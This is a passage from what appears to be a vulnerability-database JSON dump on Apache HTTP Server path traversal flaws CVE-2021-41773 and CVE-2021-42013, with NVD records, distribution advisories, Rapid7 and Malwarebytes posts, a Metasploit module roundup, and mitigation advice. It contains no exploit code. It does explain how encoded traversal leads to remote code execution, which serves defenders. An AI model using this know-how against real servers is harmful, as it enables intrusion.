"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", "CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mageia": [{"lastseen": "2022-04-18T11:19:35", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution (CVE-2021-42013). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T19:12:12", "type": "mageia", "title": "Updated apache packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-08T19:12:12", "id": "MGASA-2021-0470", "href": "https://advisories.mageia.org/MGASA-2021-0470.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-02-09T14:33:01", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T16:15:00", "type": "cve", "title": "CVE-2021-42013", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-10-05T18:14:00", "cpe": ["cpe:/o:fedoraproject:fedora:34", "cpe:/a:apache:http_server:2.4.49", "cpe:/a:oracle:instantis_enterprisetrack:17.3", "cpe:/a:netapp:cloud_backup:-", "cpe:/a:apache:http_server:2.4.50", "cpe:/a:oracle:instantis_enterprisetrack:17.2", "cpe:/a:oracle:instantis_enterprisetrack:17.1", "cpe:/o:fedoraproject:fedora:35"], "id": "CVE-2021-42013", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-42013", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:instantis_enterprisetrack:17.3:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.50:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.2:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:32:44", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T09:15:00", "type": "cve", "title": "CVE-2021-41773", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-10-28T16:16:00", "cpe": ["cpe:/o:fedoraproject:fedora:34", "cpe:/a:apache:http_server:2.4.49", "cpe:/a:oracle:instantis_enterprisetrack:17.3", "cpe:/a:netapp:cloud_backup:-", "cpe:/a:oracle:instantis_enterprisetrack:17.2", "cpe:/a:oracle:instantis_enterprisetrack:17.1", "cpe:/o:fedoraproject:fedora:35"], "id": "CVE-2021-41773", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-41773", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:oracle:instantis_enterprisetrack:17.3:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.2:*:*:*:*:*:*:*"]}], "rapid7blog": [{"lastseen": "2021-10-16T08:58:36", "description": "CVE | Vendor Advisory | AttackerKB | IVM Content | Patching Urgency | Last Update \n---|---|---|---|---|--- \nCVE-2021-41773, CVE-2021-42013 | [Apache Advisory](<https://httpd.apache.org/security/vulnerabilities_24.html>) | [AttackerKB](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>) | Available | ASAP | October 12, 2021 15:00 ET \n \n\n\n_See the `Updates` section at the end of this post for information on developments that occurred after initial publication._\n\nOn Monday, October 4, 2021, Apache published [an advisory](<https://httpd.apache.org/security/vulnerabilities_24.html>) on [CVE-2021-41773](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>), an unauthenticated remote file disclosure vulnerability in HTTP Server version 2.4.49 and 2.4.50 (see the `Updates` section for more on 2.4.50). The vulnerability arises from the mishandling of URL-encoded path traversal characters in the HTTP GET request. Public proof-of-concept exploit code is widely available, and Apache and others have noted that this vulnerability is being exploited in the wild. Note that a non-default configuration is required for exploitability.\n\nWhile the original advisory indicated that CVE-2021-41773 was merely an information disclosure bug, both [Rapid7](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>) and [community](<https://twitter.com/hackerfantastic/status/1445529822071967745>) researchers have verified that the vulnerability can be used for remote code execution **when [mod_cgi](<https://httpd.apache.org/docs/current/mod/mod_cgi.html>) is enabled.** While mod_cgi is not enabled in the default Apache Server HTTP configuration, it\u2019s also not an uncommon feature to enable. With mod_cgi enabled, an attacker can execute arbitrary programs via HTTP POST requests. The initial RCE proof of concept resulted in blind command execution, and there have been multiple proofs of concept that coerce the HTTP server into sending the program\u2019s output back to the attacker. Rapid7\u2019s research team has a [full root cause analysis of CVE-2021-41773 here](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>) along with proofs of concept.\n\nRapid7 Labs has identified roughly 65,000 potentially vulnerable versions of Apache httpd exposed to the public internet. Our exposure estimate intentionally does not count multiple Apache servers on the same IP as different instances (this would substantially increase the number of exposed instances identified as vulnerable).\n\n\n\n## Mitigation guidance\n\nOrganizations that are using Apache HTTP Server 2.4.49 or 2.4.50 should determine whether they are using vulnerable configurations. If a vulnerable server is discovered, the server\u2019s configuration file should be updated to include the filesystem directory directive with _require all denied_:\n \n \n <Directory />\n Require all denied\n </Directory>\n \n\nApache HTTP Server users should update to **2.4.51** or later as soon as is practical. Updating to HTTP Server 2.4.51 remediates both CVE-2021-41773 and CVE-2021-42013. For more information, see [Apache\u2019s advisory here](<https://httpd.apache.org/security/vulnerabilities_24.html>).\n\n## Rapid7 customers\n\nA remote vulnerability check for CVE-2021-41773 was released to InsightVM and Nexpose customers in the October 6, 2021 content update.\n\nA remote vulnerability check for CVE-2021-42013 was released to InsightVM and Nexpose customers in the October 7, 2021 content update.\n\n## Updates\n\n**October 7, 2021:** Apache has updated their advisory to note that the patch for CVE-2021-41773 was incomplete, rendering HTTP Server 2.4.50 versions vulnerable when specific, non-default conditions are met. According to their advisory, &quot;an attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration _require all denied_, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution.&quot;\n\nCVE-2021-42013 has been assigned to track the incomplete fix for CVE-2021-41773. CVE-2021-42013 has been fixed in HTTP Server version 2.4.51 released October 7, 2021. For more information, [see Apache's advisory](<https://httpd.apache.org/security/vulnerabilities_24.html>).\n\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2021-10-06T16:42:32", "type": "rapid7blog", "title": "Apache HTTP Server CVE-2021-41773 Exploited in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-06T16:42:32", "id": "RAPID7BLOG:9C7E6BE350F06790928CFF68E04A6ECE", "href": "https://blog.rapid7.com/2021/10/06/apache-http-server-cve-2021-41773-exploited-in-the-wild/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-29T19:03:07", "description": "## OMIGOD It's RCE\n\n\n\nWe are excited to announce that we now have a module for the OMIGOD vulnerability that exploits [CVE-2021-38647](<https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647?referrer=blog>) courtesy of our very own Spencer McIntyre! Successful exploitation will allow an unauthenticated attacker to gain `root` level code execution against affected servers. Given that this has seen exploitation in the wild by the Mirai botnet, we hope you're patched, lest your servers decide to join the zombie horde this Halloween!\n\n## Sophos Contributes to the RCE Pile\n\nContinuing the trend of unauthenticated RCE exploits that grant `root` level code execution, this week we also have an exploit for [CVE-2020-25223](<https://attackerkb.com/topics/rOhVHstwNO/cve-2020-25223?referrer=blog>), an unauthenticated RCE within the Sophos UTM WebAdmin service. Whilst we haven't yet seen exploitation in the wild of this bug, this is definitely one to patch given its severity. Stay frosty folks!\n\n## Guess Who\u2019s Back, Back Again, Apache's Back, Tell a Friend\n\nWhilst not a marshalling bug (I'm sorry, it's Halloween some puns are needed), community contributors Ash Daulton, Dhiraj Mishra, and mekhalleh (RAMELLA S\u00e9bastien), have added a scanner and exploit for [CVE-2021-41773](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773?referrer=blog>) and [CVE-2021-42013](<https://attackerkb.com/topics/CVE-2021-42013?referrer=blog>), which was based off of work from [RootUp](<https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse>), [ProjectDiscovery](<https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/apache/apache-httpd-rce.yaml>), and [HackerFantastic](<https://twitter.com/hackerfantastic/status/1445531829985968137>). Path traversal vulnerabilities are relatively easy to exploit, and this got a lot of attention in the news since it's been a long time since Apache has seen a reliable RCE exploit against it. This is definitely one to patch if you're running any Apache servers. Successful exploitation will result in remote code execution as the user running the Apache server.\n\n## New module content (6)\n\n * [Squid Proxy Range Header DoS](<https://github.com/rapid7/metasploit-framework/pull/15756>) by Joshua Rogers, which exploits [CVE-2021-31806](<https://attackerkb.com/topics/2k0UqRcdTC/cve-2021-31806?referrer=search>) and [CVE-2021-31807](<https://attackerkb.com/topics/xIwbe92O2s/cve-2021-31807?referrer=blog>) \\- This adds a module that leverages CVE-2021-31806 and CVE-2021-31807 to trigger a denial of service condition in vulnerable Squid proxy servers.\n * [Apache 2.4.49/2.4.50 Traversal RCE scanner](<https://github.com/rapid7/metasploit-framework/pull/15754>) by Ash Daulton, Dhiraj Mishra, and mekhalleh (RAMELLA S\u00e9bastien), which exploits [CVE-2021-41773](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773?referrer=search>) and [CVE-2021-42013](<https://attackerkb.com/topics/CVE-2021-42013?referrer=blog>) \\- This adds both a scanner and exploit module for the two recent path traversal vulnerabilities in the apache2 HTTP server. The RCE module requires `mod_cgi` to be enabled but can be exploited remotely without any authentication. These vulnerabilities are identified as CVE-2021-41773 and CVE-2021-42013.\n * [Sophos UTM WebAdmin SID Command Injection](<https://github.com/rapid7/metasploit-framework/pull/15783>) by wvu and Justin Kennedy, which exploits [CVE-2020-25223](<https://attackerkb.com/topics/rOhVHstwNO/cve-2020-25223?referrer=blog>) \\- This adds an exploit for CVE-2020-25223 which is an unauthenticated RCE within the Sophos UTM WebAdmin service. Exploitation results in OS command execution as the `root` user.\n * [Microsoft OMI Management Interface Authentication Bypass](<https://github.com/rapid7/metasploit-framework/pull/15800>) by wvu, Nir Ohfeld, Shir Tamari, and Spencer McIntyre, which exploits [CVE-2021-38647](<https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647?referrer=blog>) \\- We added an unauthenticated RCE exploit for Microsoft OMI &quot;OMIGOD&quot; CVE-2021-38647. Successful exploitation grants code execution as the `root` user.\n * [Apache 2.4.49/2.4.50 Traversal RCE](<https://github.com/rapid7/metasploit-framework/pull/15754>) by Ash Daulton, Dhiraj Mishra, and mekhalleh (RAMELLA S\u00e9bastien), which exploits [CVE-2021-41773](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773?referrer=search>) and [CVE-2021-42013](<https://attackerkb.com/topics/CVE-2021-42013?referrer=blog>) \\- This adds both a scanner and exploit module for the two recent path traversal vulnerabilities in the apache2 HTTP server. The RCE module requires `mod_cgi` to be enabled but can be exploited remotely without any authentication. These vulnerabilities are identified as CVE-2021-41773 and CVE-2021-42013.\n * [Browse the session filesystem in a Web Browser](<https://github.com/rapid7/metasploit-framework/pull/15558>) by timwr - This adds a post module that allows the user to view the Meterpreter sessions filesystem via a locally hosted web page.\n\n## Enhancements and features\n\n * [#15681](<https://github.com/rapid7/metasploit-framework/pull/15681>) from [smashery](<https://github.com/smashery>) \\- This adds support for reverse port forwarding via established SSH sessions.\n * [#15778](<https://github.com/rapid7/metasploit-framework/pull/15778>) from [k0pak4](<https://github.com/k0pak4>) \\- This PR adds documentation for the http trace scanner.\n * [#15788](<https://github.com/rapid7/metasploit-framework/pull/15788>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- When generating a Powershell command payload would exceed the maximum length allowed to successfully execute, gracefully fall back to omitting an ASMI bypass.\n * [#15803](<https://github.com/rapid7/metasploit-framework/pull/15803>) from [k0pak4](<https://github.com/k0pak4>) \\- This adds f5_bigip_virtual_server scanner documentation.\n\n## Bugs fixed\n\n * [#15799](<https://github.com/rapid7/metasploit-framework/pull/15799>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a crash in the `iis_internal_ip` module.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.1.11...6.1.12](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-10-21T11%3A22%3A54-04%3A00..2021-10-28T08%3A17%3A18-05%3A00%22>)\n * [Full diff 6.1.11...6.1.12](<https://github.com/rapid7/metasploit-framework/compare/6.1.11...6.1.12>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest version of Metasploit Framework. To install fresh without using `git`, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-29T17:59:46", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25223", "CVE-2021-31806", "CVE-2021-31807", "CVE-2021-38647", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-29T17:59:46", "id": "RAPID7BLOG:8C1A6CAF7B07CD1A38A8D65351756A2F", "href": "https://blog.rapid7.com/2021/10/29/metasploit-wrap-up-136/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "httpd": [{"lastseen": "2022-03-17T19:28:46", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. \n\nIf files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution.\n\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-06T00:00:00", "type": "httpd", "title": "Apache Httpd < 2.4.51 : Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T00:00:00", "id": "HTTPD:E1C40920F9DFC60284EEE7539DA30483", "href": "https://httpd.apache.org/security_report.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2021-10-13T10:35:39", "description": "The Apache HTTP Server 2.4.49 is vulnerable to a flaw that allows attackers to use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by &quot;require all denied&quot; these requests can succeed. This issue is known to be exploited in the wild.\n\n### The vulnerability\n\nThe Apache HTTP Server Project started out as an effort to develop and maintain an open-source HTTP server for modern operating systems, including UNIX and Windows. It provides a secure, efficient, and extensible server that provides HTTP services in sync with the current HTTP standards.\n\nThe flaw (listed as [CVE-2021-41773](<https://nvd.nist.gov/vuln/detail/CVE-2021-41773>)) was introduced by a change made to path normalization in Apache HTTP Server 2.4.49. So, earlier versions are not vulnerable, nor are servers that are configured to &quot;require all denied&quot;. \n\nUnfortunately, \u201crequire all denied\u201d is off in the default configuration. This is the setting that typically shows an error that looks like this:\n\n_ &quot;Forbidden. You don&#x27;t have permission to access {path}.&quot;_\n\n### Path traversal attack\n\nPath traversal attacks are done by sending requests to access backend or sensitive server directories that should be out of reach for unauthorized users. While normally these requests are blocked, the vulnerability allows an attacker to bypass the filters by using encoded characters (ASCII) for the URLs.\n\nUsing this method an attacker could gain access to files like cgi scripts that are active on the server, which could potentially reveal configuration details that could be used in further attacks.\n\n### Impact\n\nThe Apache HTTP Server Project was launched in 1995, and it&#x27;s been the most popular web server on the Internet since April 1996. In August 2021 there were some 49 million active sites running on Apache server. Obviously we do not know which server every domain is using, but of the sites where we can identify the web server, Apache is used by 30.9%.\n\nA [Shodan search by Bleeping Computer](<https://www.bleepstatic.com/images/news/u/1220909/Code%20and%20Details/apache_number.jpg> \"\" ) showed that there are over a hundred thousand Apache HTTP Server 2.4.49 deployments online, many of which could be vulnerable to exploitation.\n\nSecurity researchers have warned that admins should patch immediately.\n\n> If you use Apache HTTP Server 2.4.49 (only that version), you should update to 2.4.50 now due to CVE-2021-41773, a nasty 0-day path traversal vulnerability <https://t.co/2QiV4h77B4>\n> \n> -- Mark J Cox (@iamamoose) [October 5, 2021](<https://twitter.com/iamamoose/status/1445304838963830784?ref_src=twsrc%5Etfw>)\n\n### Another vulnerability\n\nThere&#x27;s a second vulnerability tackled by this patch\u2014[CVE-2021-41524](<https://nvd.nist.gov/vuln/detail/CVE-2021-41524>)\u2014a null pointer dereference detected during HTTP/2 request processing. This flaw allows an attacker to perform a denial of service (DoS) attack on the server. This requires a specially crafted request.\n\nThis flaw also only exists in Apache Server version 2.4.49, but is different to the first vulnerability in that, as far as we know, it is not under active exploitation. It was discovered three weeks ago, fixed late last month, and incorporated now in version 2.4.50.\n\n### Mitigation\n\nAll users should install the latest version as soon as possible, but:\n\n * Users that have not installed 2.4.49 yet should skip this version in their update cycle and go straight to 2.4.50.\n * Users that have 2.4.49 installed should configure \u201crequire all denied\u201d if they do not plan to patch quickly, since this blocks the attack that has been seen in the wild.\n\nA full list of vulnerabilities in Apache HTTP Server 2.4 can be found [here](<https://httpd.apache.org/security/vulnerabilities_24.html>).\n\n## Update, October 8 